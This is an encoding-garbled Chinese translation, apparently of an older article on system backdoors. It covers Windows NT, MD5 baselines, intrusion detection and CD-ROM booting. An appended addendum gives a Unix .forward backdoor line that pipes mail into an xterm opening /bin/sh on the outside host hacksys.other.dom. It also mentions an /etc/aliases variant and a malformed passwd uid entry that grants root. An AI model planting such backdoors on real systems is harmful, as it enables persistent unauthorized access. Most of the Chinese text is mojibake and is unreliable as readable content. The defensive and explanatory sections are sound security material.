µ±Ç°Î»ÖãºLinux½Ì³Ì - Linux - ¹ØÓÚϵͳºóÃÅ(2)

¹ØÓÚϵͳºóÃÅ(2)



         Windows NT
    ÓÉÓÚWindows NT²»ÄÜÇáÒ×µÄÔÊÐí¶à¸öÓû§ÏóUnixÏ·ÃÎÊһ̨»úÆ÷, ¶ÔÈëÇÖÕßÀ´Ëµ¾ÍºÜ ÄÑ´³ÈëWindows NT,°²×°ºóÃÅ,²¢´ÓÄÇÀï·¢Æð¹¥»÷. Òò´ËÄ㽫¸üƵ·±µØ¿´µ½¹ã·ºµÄÀ´×Ô UnixµÄÍøÂç¹¥»÷. µ±Windows NTÌá¸ß¶àÓû§¼¼Êõºó, ÈëÇÖÕß½«¸üƵ·±µØÀûÓà WindowsNT.Èç¹ûÕâÒ»ÌìÕæµÄµ½À´, Ðí¶àUnixµÄºóÃż¼Êõ½«ÒÆÖ²µ½Windows NTÉÏ, ¹ÜÀí Ô±¿ÉÒԵȺòÈëÇÖÕߵĵ½À´. ½ñÌì, Windows NTÒѾ­ÓÐÁËtelnetÊØ»¤³ÌÐò. ͨ¹ýÍøÂçͨ ÐкóÃÅ, ÈëÇÖÕß·¢ÏÖÔÚWindows NT°²×°ËüÃÇÊÇ¿ÉÐеÄ. ( With Network Traffic backdoors, theyarevery feasible for intruders to install on Windows NT. ´Ë ´¦¸ÃÈçºÎ·­Òë? :(

    ½â¾ö

    µ±ºóÃż¼ÊõÔ½ÏȽø, ¹ÜÀíÔ±Ô½ÄÑÓÚÅжÏÈëÇÖÕßÊÇ·ñÇÖÈëºóÕßËûÃÇÊÇ·ñ±»³É¹¦·âɱ.

    ÆÀ¹À

    Ê×ÏÈÒª×öµÄÊÇ»ý¼«×¼È·µÄ¹À¼ÆÄãµÄÍøÂçµÄ´àÈõÐÔ, ´Ó¶øÅж¨Â©¶´µÄ´æÔÚÇÒÐÞ¸´Ö®.Ðí¶à ÉÌÒµ¹¤¾ßÓÃÀ´°ïÖúɨÃèºÍ²éºËÍøÂ缰ϵͳµÄ©¶´. Èç¹û½ö½ö°²×°ÌṩÉ̵ݲȫ²¹¶¡µÄ »°,Ðí¶à¹«Ë¾½«´ó´óÌá¸ß°²È«ÐÔ.

    MD5»ù×¼Ïß

    Ò»¸öϵͳ(°²È«)ɨÃèµÄÒ»¸öÖØÒªÒòËØÊÇMD5УÑéºÍ»ù×¼Ïß. MD5»ù×¼ÏßÊÇÔÚºÚ¿ÍÈëÇÖÇ° Óɸɾ» ϵͳ½¨Á¢. Ò»µ©ºÚ¿ÍÈëÇÖ²¢½¨Á¢Á˺óÃÅÔÙ½¨Á¢»ù×¼Ïß, ÄÇôºóÃÅÒ²±»ºÏ²¢½øÈ¥ÁË.һЩ ¹«Ë¾±»ÈëÇÖÇÒϵͳ±»°²ÖúóÃų¤´ï¼¸¸öÔÂ.ËùÓеÄϵͳ±¸·Ý¶à°üº¬Á˺óÃÅ. µ±¹«Ë¾·¢ÏÖ ÓкڿͲ¢ÇóÖú±¸·Ýìî³ýºóÃÅʱ, Ò»ÇÐŬÁ¦ÊÇͽÀ͵Ä, ÒòΪËûÃǻָ´ÏµÍ³µÄͬʱҲ»Ö¸´ Á˺óÃÅ. Ó¦¸ÃÔÚÈëÇÖ·¢ÉúÇ°×÷ºÃ»ù×¼ÏߵĽ¨Á¢.

    ÈëÇÖ¼ì²â

    Ëæן÷ÖÖ×éÖ¯µÄÉÏÍøºÍÔÊÐí¶Ô×Ô¼ºÄ³Ð©»úÆ÷µÄÁ¬½Ó,ÈëÇÖ¼ì²âÕý±äµÄÔ½À´Ô½ÖØÒª.ÒÔÇ° ¶àÊýÈëÇÖ¼ì²â¼¼ÊõÊÇ»ùÓÚÈÕÖ¾Ð͵Ä. ×îеÄÈëÇÖ¼ì²âϵͳ¼¼Êõ(IDS)ÊÇ»ùÓÚʵʱÕìÌýºÍ ÍøÂçͨÐа²È«·ÖÎöµÄ. ×îеÄIDS¼¼Êõ¿ÉÒÔä¯ÀÀDNSµÄUDP±¨ÎÄ, ²¢ÅжÏÊÇ·ñ·ûºÏDNSЭ ÒéÇëÇó. Èç¹ûÊý¾Ý²»·ûºÏЭÒé, ¾Í·¢³ö¾¯¸æÐźŲ¢×¥È¡Êý¾Ý½øÐнøÒ»²½·ÖÎö. ͬÑùµÄ Ô­Ôò¿ÉÒÔÔËÓõ½ICMP°ü, ¼ì²éÊý¾ÝÊÇ·ñ·ûºÏЭÒéÒªÇó, »òÕßÊÇ·ñ×°ÔؼÓÃÜshell»á»°.

    ´ÓCD-ROMÆô¶¯

    һЩ¹ÜÀíÔ±¿¼ÂÇ´ÓCD-ROMÆô¶¯´Ó¶øÏû³ýÁËÈëÇÖÕßÔÚCD-ROMÉÏ×öºóÃŵĿÉÄÜÐÔ.ÕâÖÖ·½·¨ µÄÎÊÌâÊÇʵÏֵķÑÓúÍʱ¼ä¹»ÆóÒµÃæÁÙµÄ.

    ¾¯¸æ

    ÓÉÓÚ°²È«ÁìÓò±ä»¯Ö®¿ì, ÿÌìÓÐеĩ¶´±»¹«²¼, ¶øÈëÇÖÕßÕý²»¶ÏÉè¼ÆÐµĹ¥»÷ºÍ°² ÖúóÃż¼Êõ, °²ÕíÎÞÓǵݲȫ¼¼ÊõÊÇûÓеÄ.Çë¼ÇסûÓмòµ¥µÄ·ÀÓù,Ö»Óв»Ð¸µÄŬÁ¦! ( Be aware that no defense is foolproof, and that there is no substitute for diligent attention. ´Ë¾ä¸ÃÈçºÎ·­Òë? :( )

    -------------------------------------------------------------------------

    you may want to add:

    .forward Backdoor

    On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username¡®¡® a .forward file might be constructed as follows:

    username |¡°/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh¡°

    permutations of this method include alteration of the systems mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

    PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on &nbs>

    the client and server).

    > Using smrsh can effectively negate this backdoor (although it¡®s quite > possibly still a problem if you allow things like elm¡®s filter or > procmail which can run programs themselves...).

    ÄãÒ²ÐíÒªÔö¼Ó:

    .forwardºóÃÅ

    UnixÏÂÔÚ.forwardÎļþÀï·ÅÈëÃüÁîÊÇÖØлñµÃ·ÃÎʵij£Ó÷½·¨. ÕÊ»§¡®username¡® µÄ .forward¿ÉÄÜÉèÖÃÈçÏÂ:

    username |¡°/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh¡°

    ÕâÖÖ·½·¨µÄ±äÐΰüÀ¨¸Ä±äϵͳµÄmailµÄ±ðÃûÎļþ(ͨ³£Î»ÓÚ/etc/aliases). ×¢ÒâÕâÖ» ÊÇÒ»ÖÖ¼òµ¥µÄ±ä»». ¸üΪ¸ß¼¶µÄÄܹ»´Ó.forwardÖÐÔËÐмòµ¥½Å±¾ÊµÏÖÔÚ±ê×¼ÊäÈëÖ´ÐÐ ÈÎÒâÃüÁî(С²¿·ÖÔ¤´¦Àíºó). >ÀûÓÃsmrsh¿ÉÒÔÓÐЧµÄÖÆÖ¹ÕâÖÖºóÃÅ(ËäÈ»Èç¹ûÔÊÐí¿ÉÒÔ×ÔÔËÐеÄelm¡®s filter»ò procmail>Àà³ÌÐò, ºÜÓпÉÄÜ»¹ÓÐÎÊÌâ ......)

    ( ´Ë¶ÎµÄÄÚÈÝÀí½â²»Éî, ¹Ê¸¶ÉÏÓ¢ÎÄ, ÇëÖ¸½Ì! )

    ---------------------------------------------------------------------------

    ÄãÒ²ÐíÄÜÓÃÕâ¸ö¡°ÌØÐÔ¡°×öºóÃÅ:

    µ±ÔÚ/etc/passwordÀïÖ¸¶¨Ò»¸ö´íÎóµÄuid/gidºó, ´ó¶àÊýlogin(1)µÄʵÏÖÊDz»Äܼì²é ³öÕâ¸ö´íÎó µÄuid/gid, ¶øatoi(3)½«Éèuid/gidΪ0, ±ã¸øÁ˳¬¼¶Óû§µÄȨÀû.

    Àý×Ó:

    rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh ÔÚLinuxÀï,Õ⽫°ÑÓû§rmartinµÄuidÉèΪ0. ±¾ÎÄËùÓÐȨ¹é×÷ÕßËùÓУ¡ÈçҪתÔØÇë±£³ÖÎÄÕÂÍêÕûÐÔ ÂÌÉ«±øÍÅ http://i.am/hack1/

    iamtheguest Òë
    ·¢²¼ÈË:Crystal À´×Ô:Öйú³¬¼¶unixÁªÃË